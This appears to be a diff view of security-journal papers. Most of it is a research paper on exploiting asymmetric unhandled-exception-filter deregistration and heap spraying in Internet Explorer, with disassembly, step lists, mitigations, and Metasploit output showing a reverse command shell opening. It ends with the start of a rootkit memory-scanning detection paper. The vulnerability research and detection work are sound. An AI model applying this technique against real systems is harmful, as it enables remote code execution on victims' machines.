exception dispatcher must take one final stab at getting it handled
|
||||
before forcing the application to terminate. One of the options the
|
||||
exception dispatcher has at this point is to pass the exception to a
|
||||
debugger, assuming one is attached. Otherwise, it has no choice but to
|
||||
try to handle the exception internally and abort the application if that
|
||||
fails. To allow this to happen, applications can make a call to the
|
||||
unhandled exception filter associated with the process as described in [5].
|
||||
In the general case, calling the unhandled exception filter will result
|
||||
in kernel32!UnhandledExceptionFilter being called with information about
|
||||
the exception being dispatched.
|
||||
|
||||
The job of kernel32!UnhandledExceptionFilter is two fold. First, if a
|
||||
debugger is not present, it must make a call to the top-level UEF
|
||||
registered with the process. The top-level UEF can then attempt to
|
||||
handle the exception, possibly recovering and allowing execution to
|
||||
continue, such as by returning EXCEPTION_CONTINUE_EXECUTION. Failing
|
||||
that, it can either forcefully terminate the process, typically by
|
||||
returning EXCEPTION_EXECUTE_HANDLER or allow the normal error reporting
|
||||
dialog to be displayed by returning EXCEPTION_CONTINUE_SEARCH. If a
|
||||
debugger is present, the unhandled exception filter will attempt to pass
|
||||
the exception on to the debugger in order to give it a chance to handle
|
||||
the exception. When this occurs, the top-level UEF is not called. This
|
||||
is important to remember as the paper goes on, as it can be a source of
|
||||
trouble if one forgets this fact.
|
||||
|
||||
When operating with no debugger present,
|
||||
kernel32!UnhandledExceptionFilter will attempt to decode the function
|
||||
pointer associated with the top-level UEF by calling
|
||||
kernel32!RtlDecodePointer on the global variable that contains the
|
||||
top-level UEF, kernel32!kernel32!BasepCurrentTopLevelFilter, as shown
|
||||
below:
|
||||
|
||||
|
||||
7c862cc1 ff35ac33887c push dword ptr [kernel32!BasepCurrentTopLevelFilter]
|
||||
7c862cc7 e8e1d6faff call kernel32!RtlDecodePointer (7c8103ad)
|
||||
|
||||
If the value returned from kernel32!RtlDecodePointer is not NULL, then a
|
||||
call is made to the now-decoded top-level UEF function, passing the
|
||||
exception information on:
|
||||
|
||||
|
||||
7c862ccc 3bc7 cmp eax,edi
|
||||
7c862cce 7415 jz kernel32!UnhandledExceptionFilter+0x15b (7c862ce5)
|
||||
7c862cd0 53 push ebx
|
||||
7c862cd1 ffd0 call eax
|
||||
|
||||
The return value of the filter will control whether or not the
|
||||
application continues execution, terminates, or reports an error and
|
||||
terminates.
|
||||
|
||||
|
||||
3.3) Uses for Unhandled Exception Filters
|
||||
|
||||
In most cases, unhandled exception filters are used for
|
||||
language-specific exception handling. This usage is all done
|
||||
transparently to programmers of the language. For instance, C++ code
|
||||
will typically register an unhandled exception filter through
|
||||
CxxSetUnhandledExceptionFilter during CRT initialization as called from
|
||||
the entry point associated with the program or shared library.
|
||||
Likewise, C++ will typically deregister the unhandled exception filter
|
||||
that it registers by calling CxxRestoreUnhandledExceptionFilter during
|
||||
program termination or shared library unloading.
|
||||
|
||||
Other uses include programs that wish to do advanced error reporting or
|
||||
information collection prior to allowing an application to terminate due
|
||||
to an unhandled exception.
|
||||
|
||||
|
||||
4) Gaining Control of the Unhandled Exception Filter
|
||||
|
||||
At this point, the only feasible vector for gaining control of the
|
||||
top-level UEF is to cause calls to be made to
|
||||
kernel32!SetUnhandledExceptionFilter. This is primarily due to the fact
|
||||
that the global variable has the current function pointer encoded. One
|
||||
could consider attempting to cause code to be redirected directly to
|
||||
kernel32!SetUnhandledExceptionFilter, but doing so would require some
|
||||
kind of otherwise-exploitable vulnerability in an application, thus
|
||||
making it not useful in the context of this document.
|
||||
|
||||
|
||||
Given these restrictions, it makes sense to think a little bit more
|
||||
about the process involved in registering and deregistering UEFs. Since
|
||||
the chain of registered UEFs is implicit, it may be possible to cause
|
||||
that chain to become corrupt or invalid in some way that might be
|
||||
useful. One of the requirements that is known about the registration
|
||||
process for top-level UEFs is that the register and deregister
|
||||
operations must be symmetric. What happens if they aren't, though?
|
||||
Consider the following example where Fx and Gx are registered and
|
||||
deregistered, but in asymmetric order.
|
||||
|
||||
In this example, Fx and Gx are registered first. Following that, Fx is
|
||||
deregistered prior to deregistering Gx, thus making the operation
|
||||
asymmetrical. As a result of Fx deregistering first, the top-level UEF
|
||||
is set to Nx, even though Gx should technically still be a part of the
|
||||
chain. Finally, Gx deregisters, setting the top-level UEF to Fx even
|
||||
though Fx had been previously deregistered. This is obviously incorrect
|
||||
behavior, but the code associated with Gx has no idea that Fx has been
|
||||
deregistered due to the implicit chain that is created.
|
||||
|
||||
If asymmetric registration of UEFs can be made to occur, it might be
|
||||
possible for an attacker to gain control of the top-level UEF. Consider
|
||||
for a moment that the register and deregister operations in the diagram
|
||||
in figure occur during DLL load and unload, respectively. If that is
|
||||
the case, then after deregistration occurs, the DLLs associated with the
|
||||
UEFs will be unloaded. This will leave the top-level UEF set to Fx
|
||||
which now points to an invalid region of memory. If an exception occurs
|
||||
after this point and is not handled by a registered exception handler,
|
||||
the unhandled exception filter will be called. If a debugger is not
|
||||
attached, the top-level UEF Fx will be called. Since Fx points to
|
||||
memory that is no longer associated with the DLL that contained Fx, the
|
||||
process will terminate --- or worse.
|
||||
|
||||
From a security prospective, the act of leaving a dangling function
|
||||
pointer that now points to unallocated memory can be a dream come true.
|
||||
If a scenario such as this occurs, an attacker can attempt to consume
|
||||
enough memory that will allow them to store arbitrary code at the
|
||||
location that the function originally resided. In the event that the
|
||||
function is called, the attacker's arbitrary code will be executed
|
||||
rather than the code that was was originally at that location. In the
|
||||
case of the top-level UEF, the only thing that an attacker would need to
|
||||
do in order to cause the function pointer to be called is to generate an
|
||||
unhandled exception, such as a NULL pointer dereference.
|
||||
|
||||
All of these details combine to provide a feasible vector for executing
|
||||
arbitrary code. First, it's necessary to be able to cause at least two
|
||||
DLLs that set UEFs to be deregistered asymmetrically, thus leaving the
|
||||
top-level UEF pointing to invalid memory. Second, it's necessary to
|
||||
consume enough memory that attacker controlled code can reside at the
|
||||
location that one of the UEF functions originally resided. Finally, an
|
||||
exception must be generated that causes the top-level UEF to be called,
|
||||
thus executing the attacker's arbitrary code.
|
||||
|
||||
The big question, though, is how feasible is it to really be able to
|
||||
control the registering and deregistering of UEFs? To answer that,
|
||||
chapter provides a case study on one such application where it's all
|
||||
too possible: Internet Explorer.
|
||||
|
||||
|
||||
5) Case Study: Internet Explorer
|
||||
|
||||
Unfortunately for Internet Explorer, it's time for it to once again dawn
|
||||
the all-too-exploitable hat and tell us about how it can be used as a
|
||||
medium to gain arbitrary code execution with all otherwise
|
||||
non-exploitable bugs. In this approach, Internet Explorer is used as a
|
||||
medium for causing DLLs that register and deregister top-level UEFs to
|
||||
be loaded and unloaded. One way in which an attacker can accomplish
|
||||
this is by using Internet Explorer's facilities for instantiating COM
|
||||
objects from within the browser. This can be accomplished either by
|
||||
using the new ActiveXObject construct in JavaScript or by using the HTML
|
||||
OBJECT tag.
|
||||
|
||||
In either case, when a COM object is being instantiated, the DLL
|
||||
associated with that COM object will be loaded into memory if the object
|
||||
instance is created using the INPROC_SERVER. When this happens, the COM
|
||||
object's DllMain will be called. If the DLL has an unhandled exception
|
||||
filter, it may be registered during CRT initialization as called from
|
||||
the DLL's entry point. This takes care of the registering of UEFs, so
|
||||
long as COM objects that are associated with DLLs that set UEFs can be
|
||||
found.
|
||||
|
||||
To control the deregister phase, it is necessary to somehow cause the
|
||||
DLLs associated with the previously instantiated COM objects to be
|
||||
unloaded. One approach that can be taken to do this is attempt to
|
||||
leverage the locations that ole32!CoFreeUnusedLibrariesEx is called
|
||||
from. One particular place that it's called from is during the closure
|
||||
of an Internet Explorer window that once hosted the COM object. When
|
||||
this function is called, all currently loaded COM DLLs will have their
|
||||
DllCanUnloadNow routines called. If the routine returns SOK, such as
|
||||
when there are no outstanding references to COM objects hosted by the
|
||||
DLL, then the DLL can be unloaded.
|
||||
|
||||
Now that techniques for controlling the loading and unloading of DLLs
|
||||
that set UEFs has been identified, it's necessary to come up with an
|
||||
implementation that will allow the deregister phase to occur
|
||||
asymmetrically. One method that can be used to accomplish this
|
||||
illustrated by the registration phase and the deregistration
|
||||
phase described below.
|
||||
|
||||
Registration:
|
||||
|
||||
1. Open window #1
|
||||
2. Instantiate COMObject1
|
||||
3. Load DLL 1
|
||||
4. SetUnhandledExceptionFilter(Fx) => Nx
|
||||
|
||||
5. Open window #2
|
||||
6. Instantiate COMObject2
|
||||
7. Load DLL 2
|
||||
8. SetUnhandledExceptionFilter(Gx) => Fx
|
||||
|
||||
In the example described above, two windows are opened, each of which
|
||||
registers a UEF by way of a DLL that implements a specific COM object.
|
||||
In this example, the first window instantiates COMObject1 which is
|
||||
implemented by DLL 1. When DLL 1 is loaded, it registers a top-level
|
||||
UEF Fx. Once that completes, the second window is opened which
|
||||
instantiates COMObject2, thus causing DLL 2 to be loaded which also
|
||||
registers a top-level UEF, Gx. Once these operations complete, DLL 1
|
||||
and DLL 2 are still resident in memory and the top-level UEF points to
|
||||
Gx.
|
||||
|
||||
To gain control of the top-level UEF, Fx and Gx will need to be
|
||||
deregistered asymmetrically. To accomplish this, DLL 1 must be unloaded
|
||||
before DLL 2. This can be done by closing the window that hosts
|
||||
COMObject1, thus causing ole32!CoFreeUnusedLibrariesEx to be called
|
||||
which results in DLL 1 being unloaded. Following that, the window that
|
||||
hosts COMObject2 should be closed, once again causing unused libraries
|
||||
to be freed and DLL 2 unloaded. The diagram below illustrates this process.
|
||||
|
||||
Deregistration:
|
||||
|
||||
1. Close window #1
|
||||
2. CoFreeUnusedLibrariesEx
|
||||
3. Unload DLL 1
|
||||
4. SetUnhandledExceptionFilter(Nx) => Gx
|
||||
|
||||
5. Close window #2
|
||||
6. CoFreeUnusedLibrariesEx
|
||||
7. Unload DLL 2
|
||||
8. SetUnhandledExceptionFilter(Fx) => Nx
|
||||
|
||||
After the process in figure completes, Fx will be the top-level UEF for
|
||||
the process, even though the DLL that hosts it, DLL 1, has been
|
||||
unloaded. If an exception occurs at this point in time, the unhandled
|
||||
exception filter will make a call to a function that now points to an
|
||||
invalid region of memory.
|
||||
|
||||
At this point, an attacker now has reasonable control over the top-level
|
||||
UEF but is still in need of some approach that can used to place his or
|
||||
her code at the location that Fx resided at. To accomplish this,
|
||||
attackers can make use of the heap-spraying[8, 7] technique that has been
|
||||
commonly applied to browser-based vulnerabilities. The purpose of the
|
||||
heap-spraying technique is to consume an arbitrary amount of memory that
|
||||
results in the contents of the heap growing toward a specific address
|
||||
region. The contents, or spray data, is arbitrary code that will result
|
||||
in an attacker's direct or indirect control of execution flow once the
|
||||
vulnerability is triggered. For the purpose of this paper, the trigger
|
||||
is the generation of an arbitrary exception.
|
||||
|
||||
As stated above, the heap-spraying technique can be used to place code
|
||||
at the location that Fx resided. However, this is limited by whether or
|
||||
not that location is close enough to the heap to be a practical target
|
||||
for heap-spraying. In particular, if the heap is growing from
|
||||
0x00480000 and the DLL that contains Fx was loaded at 0x7c800000, it
|
||||
would be a requirement that roughly 1.988 GB of data be placed in the
|
||||
heap. That is, of course, assuming that the target machine has enough
|
||||
memory to contain this allocation (across RAM and swap). Not to mention
|
||||
the fact that spraying that much data could take an inordinate amount of
|
||||
time depending on the speed of the machine. For these reasons, it is
|
||||
typically necessary for the DLL that contains Fx in this example
|
||||
scenario to be mapped at an address that is as close as possible to a
|
||||
region that the heap is growing from.
|
||||
|
||||
During the research of this attack vector, it was found that all of the
|
||||
COM DLLs provided by Microsoft on XPSP2 are compiled to load at higher
|
||||
addresses which make them challenging to reach with heap-spraying, but
|
||||
it's not impossible. Many 3rd party COM DLLs, however, are compiled
|
||||
with a default load address of 0x00400000, thus making them perfect
|
||||
candidates for this technique. Another thing to keep in mind is that
|
||||
the preferred load address of a DLL is just that: preferred. If two
|
||||
DLLs have the same preferred load address, or their mappings would
|
||||
overlap, then obviously one would be relocated to a new location,
|
||||
typically at a lower address close to the heap, when it is loaded. By
|
||||
keeping this fact in mind, it may be possible to load DLLs that overlap,
|
||||
forcing relocation of a DLL that sets a UEF that would otherwise be
|
||||
loaded at a higher address.
|
||||
|
||||
It is also very important to note that a COM object does not have to be
|
||||
successfully instantiated for the DLL associated with it to be loaded
|
||||
into memory. This is because in order for Internet Explorer to
|
||||
determine whether or not the COM class can be created and is compatible
|
||||
with one that may be used from Internet Explorer, it must load and query
|
||||
various COM interfaces associated with the COM class. This fact is very
|
||||
useful because it means that any DLL that hosts a COM object can be used
|
||||
--- not just ones that host COM objects that can be successfully
|
||||
instantiated from Internet Explorer.
|
||||
|
||||
The culmination of all of these facts is a functional proof of concept
|
||||
exploit for Windows XP SP2 and the latest version of Internet Explorer
|
||||
with all patches applied prior to MS06-051. Its one requirement is that
|
||||
the target have Adobe Acrobat installed. Alternatively, other 3rd party
|
||||
(or even MS provided DLLs) can be used so long as they can be feasibly
|
||||
reached with heap-spraying techniques. Technically speaking, this proof
|
||||
of concept exploits a NULL pointer dereference to gain arbitrary code
|
||||
execution. It has been implemented as an exploit module for the 3.0
|
||||
version of the Metasploit Framework.
|
||||
|
||||
The following example shows this proof of concept in action:
|
||||
|
||||
|
||||
msf exploit(windows/browser/ie_unexpfilt_poc) > exploit
|
||||
[*] Started reverse handler
|
||||
[*] Using URL: http://x.x.x.x:8080/FnhWjeVOnU8NlbAGAEhjcjzQWh17myEK1Exg0
|
||||
[*] Server started.
|
||||
[*] Exploit running as background job.
|
||||
msf exploit(windows/browser/ie_unexpfilt_poc) >
|
||||
[*] Sending stage (474 bytes)
|
||||
[*] Command shell session 1 opened (x.x.x.x:4444 -> y.y.y.y:1059)
|
||||
|
||||
msf exploit(windows/browser/ie_unexpfilt_poc) > session -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
Microsoft Windows XP [Version 5.1.2600]
|
||||
(C) Copyright 1985-2001 Microsoft Corp.
|
||||
|
||||
C:\Documents and Settings\mmiller\Desktop>
|
||||
|
||||
|
||||
6) Mitigation Techniques
|
||||
|
||||
In the interest of not presenting a problem without a solution, the authors
|
||||
have devised a few different approaches that might be taken by Microsoft to
|
||||
solve this issue. Prior to identifying the solution, it is important to
|
||||
summarize the root of the problem. In this case, the authors feel that the
|
||||
problem at hand is rooted around a design flaw with the way the unhandled
|
||||
exception filter ``chain'' is maintained. In particular, the ``chain''
|
||||
management is an implicit thing which hinges on the symmetric registering and
|
||||
deregistering of unhandled exception filters. In order to solve this design
|
||||
problem, some mechanism must be put in place that will eliminate the
|
||||
symmetrical requirement. Alternatively, the symmetrical requirement could be
|
||||
retained so long as something ensured that operations never occurred out of
|
||||
order. The authors feel that this latter approach is more complicated and
|
||||
potentially not feasible. The following sections will describe a few different
|
||||
approaches that might be used or considered to solve this issue.
|
||||
|
||||
Aside from architecting a more robust implementation, this attack vector may
|
||||
also be mitigated through conventional exploitation counter-measures, such as
|
||||
NX and ASLR.
|
||||
|
||||
|
||||
6.1) Behavioral Change to SetUnhandledExceptionFilter
|
||||
|
||||
One way in which Microsoft could solve this issue would be to change the
|
||||
behavior of kernel32!SetUnhandledExceptionFilter in a manner that allows it to
|
||||
support true registration and deregistration operations rather than implicit
|
||||
ones. This can be accomplished by making it possible for the function to
|
||||
determine whether a register operation is occurring or whether a deregister
|
||||
operation is occurring.
|
||||
|
||||
Under this model, when a registration operation occurs,
|
||||
kernel32!SetUnhandledExceptionFilter can return a dynamically generated context
|
||||
that merely calls the routine that is previous to the one that was registered.
|
||||
The fact that the context is dynamically generated makes it possible for the
|
||||
function to distinguish between registrations and deregistrations. When the
|
||||
function is called with a dynamically generated context, it can assume that a
|
||||
deregistration operation os occurring. Otherwise, it must assume that a
|
||||
registration operation is occurring.
|
||||
|
||||
To ensure that the underlying list of registered UEFs is not corrupted,
|
||||
kernel32!SetUnhandledExceptionFilter can be modified to ensure that when a
|
||||
deregistration operation occurs, any dynamically generated contexts that
|
||||
reference the routine being deregistered can be updated to call to the
|
||||
next-previous routine, if any, or simply return if there is no longer a
|
||||
previous routine.
|
||||
|
||||
|
||||
6.2) Prevent Setting of non-image UEF
|
||||
|
||||
One approach that could be used to solve this issue for the general case is the
|
||||
modification of kernel32!SetUnhandledExceptionFilter to ensure that the
|
||||
function pointer being passed in is associated with an image region. By adding
|
||||
this check at the time this function is called, the attack vector described in
|
||||
this document can be mitigated. However, doing it in this manner may have
|
||||
negative implications for backward compatibility. For instance, there are
|
||||
likely to be cases where this scenario happens completely legitimately without
|
||||
malicious intent. If a check like this were to be added, a once-working
|
||||
application would begin to fail due to the added security checks. This is not
|
||||
an unlikely scenario. Just because an unhandled exception filter is is invalid
|
||||
doesn't mean that it will eventually cause the application to crash because it
|
||||
may, in fact, never be executed.
|
||||
|
||||
|
||||
6.3) Prevent Execution of non-image UEF
|
||||
|
||||
Like preventing the setting of a non-image UEF, it may also be
|
||||
possible to to modify kernel32!UnhandledExceptionFilter to prevent execution of
|
||||
the top-level UEF if it points to a non-image region. While this seems like it
|
||||
would be a useful check and should solve the issue, the fact is that it does
|
||||
not. Consider the scenario where a top-level UEF is set to an invalid address
|
||||
due to asymmetric deregistration. Following that, the top-level UEF is set to
|
||||
a new value which is the location of a valid function. After this point, if an
|
||||
unhandled exception is dispatched, kernel32!UnhandledExceptionFilter will see
|
||||
that the top-level UEF points to a valid image region and as such will call it.
|
||||
However, the top-level UEF may be implemented in such a way that it will pass
|
||||
exceptions that it cannot handle onto the previously registered top-level UEF.
|
||||
When this occurs, the invalid UEF is called which may point to arbitrary code
|
||||
at the time that it's executed. The fact that
|
||||
kernel32!UnhandledExceptionFilter can filter non-image regions does not solve
|
||||
the fact that uncontrolled UEFs may pass exceptions on up the chain.
|
||||
|
||||
|
||||
7) Future Research
|
||||
|
||||
With the technique identified for being able to control the top-level UEF by
|
||||
taking advantage of asymmetric deregistration, future research can begin to
|
||||
identify better ways in which to accomplish this. For instance, rather than
|
||||
relying on child windows in Internet Explorer, there may be another vector
|
||||
through which ole32!CoFreeUnusuedLibrariesEx can be called to cause the
|
||||
asymmetric deregistration to occur By default, ole32!CoFreeUnusedLibrariesEx is
|
||||
called every ten minutes, but this fact is not particulary useful in terms of
|
||||
general exploitation. There may also be better and more refined techniques that
|
||||
can be used to more accurately spray the heap in order to place arbitrary code
|
||||
at the location that a defunct top-level UEF resided at.
|
||||
|
||||
Aside from improving the technique itself, it is also prudent to consider other
|
||||
software applications this could be affected by this. In most cases, this
|
||||
technique will not be feasible due to an attacker's inability to control the
|
||||
loading and unloading of DLLs. However, should a mechanism for accomplishing
|
||||
this be exposed, it may indeed be possible to take advantage of this.
|
||||
|
||||
One such target software application that the authors find most intriguing
|
||||
would be IIS. If it were possible for a remote attacker to cause DLLs that use
|
||||
UEFs to be loaded and unloaded in a particular order, such as by accessing
|
||||
websites that load COM objects, then it may be possible for an attacker to
|
||||
leverage this vector on a remote webserver. At the time of this writing, the
|
||||
only approach that the authors are aware of that could permit this are remote
|
||||
debugging features present in ASP.NET that allow for the instantiation of COM
|
||||
objects that are placed in a specific allow list. This isn't a very common
|
||||
configuration, and is also limited by which COM objects can be instantiated,
|
||||
thus making it not particularly feasible. However, it is thought that other,
|
||||
more feasible techniques may exist to accomplish this.
|
||||
|
||||
Aside from IIS, the authors are also of the opinion that this attack vector
|
||||
could be applied to many of the Microsoft Office applications, such as Excel
|
||||
and Word. These suites are thought to be vulnerable due to the fact that they
|
||||
permit the instantiation and embedding of arbitrary COM objects in the document
|
||||
files. If it were possible to come up with a way to control the loading and
|
||||
unloading of DLLs through these instantiations, it may be possible to take
|
||||
advantage of the flaw outlined in this paper. One particular way in which this
|
||||
may be possible is through the use of macros, but this has a lesser severity
|
||||
because it would require some form of user interaction to permit the execution
|
||||
of macros.
|
||||
|
||||
Another interesting application that may be susceptible to this attack is
|
||||
Microsoft SQL server. Due to the fact that SQL server has features that permit
|
||||
the loading and unloading of DLLs, it may be possible to leverage a SQL
|
||||
injection attack in a way that makes it possible to gain control of the
|
||||
top-level UEF by causing certain DLLs to be loaded and unloaded However, given
|
||||
the ability to load DLLs, there are likely to be other techniques that can be
|
||||
used to gain code execution as well. Once that occurs, a large query with
|
||||
predictable results could be used as a mechanism to spray the heap. This type
|
||||
of attack could even be accomplished through something as innocuous as a
|
||||
website that is merely backed against the SQL server. Remember, attack vectors
|
||||
aren't always direct.
|
||||
|
||||
|
||||
8) Conclusion
|
||||
|
||||
The title of this paper implies that an attacker has the ability to leverage
|
||||
code execution of bugs that would otherwise not be useful, such as NULL pointer
|
||||
dereferences. To that point, this paper has illustrated a technique that can
|
||||
be used to gain control of the top-level unhandled exception filter for an
|
||||
application by making the registration and deregistration process asymmetrical.
|
||||
Once the top-level UEF has been made to point to invalid memory, an attacker
|
||||
can use techniques like heap-spraying to attempt to place attacker controlled
|
||||
code at the location that the now-defunct top-level UEF resided at. Assuming
|
||||
this can be accomplished, an attacker simply needs to be able to trigger an
|
||||
unhandled exception to cause the execution of arbitrary code.
|
||||
|
||||
The crux of this attack vector is in leveraging a design flaw in the
|
||||
assumptions made by the way the unhandled exception filter ``chain'' is
|
||||
maintained. In particular, the design assumes that calls made to register, and
|
||||
subsequently deregister, an unhandled exception filter through
|
||||
kernel32!SetUnhandledExceptionFilter will be done symmetrically. However, this
|
||||
cannot always be controlled, as DLLs that register unhandled exception filters
|
||||
are not always guaranteed to be loaded and unloaded in a symmetric fashion. If
|
||||
an attacker is capable of controlling the order in which DLLs are loaded and
|
||||
unloaded, then they may be capable of gaining arbitrary code execution through
|
||||
this technique, such as was illustrated in the Internet Explorer case study in
|
||||
chapter .
|
||||
|
||||
While not feasible in most cases, this technique has been proven to work in at
|
||||
least one critical application: Internet Explorer. Going forward, other
|
||||
applications, such as IIS, may also be found to be susceptible to this attack
|
||||
vector. All it will take is a little creativity and the right set of
|
||||
conditions.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
[1] Conover, Matt and Oded Horovitz. Reliable Windows Heap Exploits.
|
||||
http://cansecwest.com/csw04/csw04-Oded+Connover.ppt; accessed
|
||||
May 6, 2006.
|
||||
|
||||
|
||||
[2] Kazienko, Przemyslaw and Piotr Dorosz. Hacking an SQL Server.
|
||||
http://www.windowsecurity.com/articles/HackinganSQLServer.html;
|
||||
accessed May 7, 2006.
|
||||
|
||||
|
||||
[3] Litchfield, David. Windows Heap Overflows.
|
||||
http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.ppt;
|
||||
accessed May 6, 2006.
|
||||
|
||||
|
||||
[4] Howard, Michael. Protecting against Pointer Subterfuge (Kinda!).
|
||||
http://blogs.msdn.com/michael_howard/archive/2006/01/30/520200.aspx;
|
||||
accessed May 6, 2006.
|
||||
|
||||
|
||||
[5] Microsoft Corporation. UnhandledExceptionFilter.
|
||||
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/unhandledexceptionfilter.asp;
|
||||
accessed May 6, 2006.
|
||||
|
||||
|
||||
[6] Microsoft Corporation. SetUnhandledExceptionFilter.
|
||||
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/setunhandledexceptionfilter.asp;
|
||||
accessed May 6, 2006.
|
||||
|
||||
[7] Murphy, Matthew. Windows Media Player Plug-In Embed Overflow;
|
||||
http://www.milw0rm.com/exploits/1505; accessed May
|
||||
7, 2006.
|
||||
|
||||
|
||||
[8] SkyLined. InternetExploiter.
|
||||
http://www.edup.tudelft.nl/ bjwever/exploits/InternetExploiter2.zip;
|
||||
accessed May 7, 2006.
|
1004
uninformed/4.6.txt
Normal file
1004
uninformed/4.6.txt
Normal file
File diff suppressed because it is too large
Load diff
821
uninformed/4.7.txt
Normal file
821
uninformed/4.7.txt
Normal file
|
@ -0,0 +1,821 @@
|
|||
GREPEXEC: Grepping Executive Objects from Pool Memory
|
||||
bugcheck
|
||||
chris@bugcheck.org
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract:
|
||||
|
||||
As rootkits continue to evolve and become more advanced, methods that can be
|
||||
used to detect hidden objects must also evolve. For example, relying on system
|
||||
provided APIs to enumerate maintained lists is no longer enough to provide
|
||||
effective cross-view detection. To that point, scanning virtual memory for
|
||||
object signatures has been shown to provide useful, but limited, results. The
|
||||
following paper outlines the theory and practice behind scanning memory for
|
||||
hidden objects. This method relies upon the ability to safely reference the
|
||||
Windows system virtual address space and also depends upon the building and
|
||||
locating effective memory signatures. Using this method as a base, suggestions
|
||||
are made as to what actions might be performed once objects are detected. The
|
||||
paper also provides a simple example of how object-independent signatures can be
|
||||
built and used to detect several different kernel objects on all versions of
|
||||
Windows NT+. Due to time constraints, the source code associated with this
|
||||
paper will be made publicly available in the near future.
|
||||
|
||||
Thanks:
|
||||
|
||||
Thanks to skape, Peter, and the rest of the uninformed hooligans;
|
||||
you guys and gals rock!
|
||||
|
||||
Disclaimer:
|
||||
|
||||
The author is not responsible for how the papers contents are used
|
||||
or interpreted. Some information may be inaccurate or incorrect. If
|
||||
the reader feels any information is incorrect or has not been
|
||||
properly credited please contact the author so corrections can be
|
||||
made. All content refers to the Windows XP Service Pack 2
|
||||
platform unless otherwise noted.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
As rootkits become increasingly popular and more sophisticated than
|
||||
ever before, detection methods must also evolve. While rootkit
|
||||
technologies have evolved beyond API hooking methods, detectors have
|
||||
also evolved beyond the hook detection ages. At first
|
||||
rootkits such as FU were detected using various methods
|
||||
which exploited its weak and proof-of-concept design by applications
|
||||
such as Blacklight. These specific weaknesses were
|
||||
addressed in FUTo. However, some still remain excluding
|
||||
the topic of this paper.
|
||||
|
||||
RAIDE, a rootkit detection tool, uses a memory
|
||||
signature scanning method in order to find EPROCESS blocks hidden by
|
||||
FUTo. This specific implementation works, however, it too has its
|
||||
weaknesses. This paper attempts to outline the general concepts of
|
||||
implementing a successful rootkit detection method using memory
|
||||
signatures.
|
||||
|
||||
The following chapters will discuss how to safely enumerate system
|
||||
memory, what to look for when building a memory signature, what to
|
||||
do once a memory signature has been found, and potential methods of
|
||||
breaking memory signatures. Finally, an accompanying tool will be used
|
||||
to concretely illustrate the subject of this paper.
|
||||
|
||||
After reading the following paper, the reader should have an
|
||||
understanding of the concepts and issues related to kernel object
|
||||
detection using memory signatures. The author believes this to be an
|
||||
acceptable method of rootkit detection. However, as with most things
|
||||
in the security realm, no one technique is the ultimate solution and
|
||||
this technique should only be considered complimentary to other known
|
||||
detection methods.
|
||||
|
||||
|
||||
3) Scanning Memory
|
||||
|
||||
Enumerating arbitrary system memory is nowhere near a science since
|
||||
its state can change at anytime while you are attempting to access
|
||||
it. While this is true, the memory that surrounds kernel executive
|
||||
objects should be fairly consistent. With proper care, memory accesses
|
||||
should be safe and the chance of false positives and negatives should be
|
||||
fairly minimal. The following sections will outline a safe method to
|
||||
enumerate the contents of both the system's PagedPool and
|
||||
NonPagedPool.
|
||||
|
||||
3.1) Retrieving Pool Ranges
|
||||
|
||||
For the purpose of enumerating pool memory it is unnecessary to
|
||||
enumerate the entire system address space. The system maintains a
|
||||
few global variables such as nt!MmPagedPoolStart,
|
||||
nt!MmPagedPoolEnd and related NonPagedPool
|
||||
variables that can be used in order to speed up a search and reduce
|
||||
the possibility of unnecessary false positives. Although these
|
||||
global variables are not exported, there are a couple ways in that
|
||||
they can be obtained.
|
||||
|
||||
The most reliable method on modern systems (Windows XP Service Pack 2
|
||||
and up) is through the use of the KPCR->KdVersionBlock pointer located
|
||||
at fs:[0x34]. This points to a KDDEBUGGER_DATA64 structure which is
|
||||
defined in the Debugging Tools For Windows SDK header file wdbgexts.h.
|
||||
This structure is commonly used by malicious software in order to gain
|
||||
access to non-exported global variables to manipulate the system.
|
||||
|
||||
A second method to obtain PagedPool values is to reference the
|
||||
per-session nt!_MM_SESSION_SPACE found at EPROCESS->Session. This contains
|
||||
information about the session owning the process, including its ranges
|
||||
and many other PagedPool related values shown here.
|
||||
|
||||
kd> dt nt!_MM_SESSION_SPACE
|
||||
+0x01c NonPagedPoolBytes : Uint4B
|
||||
+0x020 PagedPoolBytes : Uint4B
|
||||
+0x024 NonPagedPoolAllocations : Uint4B
|
||||
+0x028 PagedPoolAllocations : Uint4B
|
||||
+0x044 PagedPoolMutex : _FAST_MUTEX
|
||||
+0x064 PagedPoolStart : Ptr32 Void
|
||||
+0x068 PagedPoolEnd : Ptr32 Void
|
||||
+0x06c PagedPoolBasePde : Ptr32 _MMPTE
|
||||
+0x070 PagedPoolInfo : _MM_PAGED_POOL_INFO
|
||||
+0x244 PagedPool : _POOL_DESCRIPTOR
|
||||
|
||||
While enumerating the entire system address space is not preferable, it
|
||||
can still be used in situations where pool information cannot be
|
||||
obtained. The start of the system address space can be assumed to be
|
||||
any address above nt!MmHighestUserAddress. However, it would appear
|
||||
that an even safer assumption would be the address following the
|
||||
LARGE_PAGE where ntoskrnl.exe and hal.dll are mapped. This can be
|
||||
obtained by using any address exported by hal.dll and rounding up to the
|
||||
nearest large page.
|
||||
|
||||
|
||||
3.2) Locking Memory
|
||||
|
||||
When accessing arbitrary memory locations, it is important that pages be
|
||||
locked in memory prior to accessing them. This is done to ensure that
|
||||
accessing the page can be done safely and will not cause an exception
|
||||
due to a race condition, such as if it were to be de-allocated between a
|
||||
check and a reference. The system provides a routine to lock pages
|
||||
named nt!MmProbeAndLockPages. This routine can be used to lock either
|
||||
pagable or non-paged memory. Since physical pages maintain a reference
|
||||
count in the nt!MmPfnDatabase there is no worry of an outside source
|
||||
unlocking the pages and having them page out to disk or become invalid.
|
||||
|
||||
In order to use MmProbeAndLockPages, a caller must first build an MDL
|
||||
structure using something such as nt!IoAllocateMdl or
|
||||
nt!MmInitializeMdl. The MDL creation routines are passed a virtual
|
||||
address and length describing the block of virtual memory to be
|
||||
referenced. On a successful call to nt!MmProbeAndLockPages, the virtual
|
||||
address range described by the MDL structure is safe to access. Once the
|
||||
block is no longer needed to be accessed, the pages must be unlocked
|
||||
using nt!MmUnlockPages.
|
||||
|
||||
A trick can be used to further reduce the number of pages locked when
